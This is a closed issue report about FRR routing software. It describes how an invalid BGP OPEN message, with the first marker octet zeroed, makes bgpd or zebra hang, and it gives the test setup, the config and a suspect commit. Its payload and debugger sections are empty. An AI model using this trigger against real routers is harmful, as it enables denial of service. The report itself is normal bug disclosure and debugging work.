Closed mwinter-osr closed 1 year ago
Here is a way to reproduce the issue:
Setup a simple network with 2 boxes: one running FRR (DUT) and one running just plain Linux for the test tool (TESTER):
+-----------+ +------------+
| | 192.168.1.0/24 | |
| TESTER +--------------------+ DUT |
| | .1 .101 | |
+-----------+ +------------+
Configure the interface on the TESTER side to 192.168.1.1/24
Start zebra, staticd and bgpd on the DUT and apply the following config:
Current configuration:
!
frr version 8.5-dev-20230131211350-git.aa16204
frr defaults traditional
hostname bgp-marker-dut
log file /tmp/frr.log
no ip forwarding
no ipv6 forwarding
service integrated-vtysh-config
!
debug zebra events
debug bgp keepalives
debug bgp neighbor-events
debug bgp zebra
!
interface ens1
ip address 192.168.1.101/24
exit
!
router bgp 501
neighbor 192.168.1.1 remote-as 500
exit
!
end
Now build the BGPTOOL ( https://git-us.netdef.org/scm/netdef/bgptool.git ) and run the executable test_bgp_bad-open-message_marker
Approx 10..15 sec later, zebra will be hanging. (as seen with vtysh commands).
in my testing it does not look like zebra becomes unresponsize, bgpd does
2023-02-02 13:27:24.016 [INFO] watchfrr: [YFT0P-5Q5YX] Forked background command [pid 2488116]: /usr/lib/frr/watchfrr.sh restart bgpd
show thread cpu is stalling on bgp
This is found on Ubuntu with FRR master @aa16204dfbff (Jan 31). The issue DOES NOT exist in 8.4
During Testing, when an invalid BGP open is sent with the first octet of the marker field overwritten with 0, Zebra ends up hanging and will no longer respond to any vtysh command or output any logs. No logs are given for this error.
TCP Payload for the BGP Open Message:
commit a0b937de428e14e869b8541f0b7810113d619c2e Author: Stephen Worley sworley@nvidia.com Date: Fri Oct 21 12:45:50 2022 -0400
Thread info when attaching with GDB: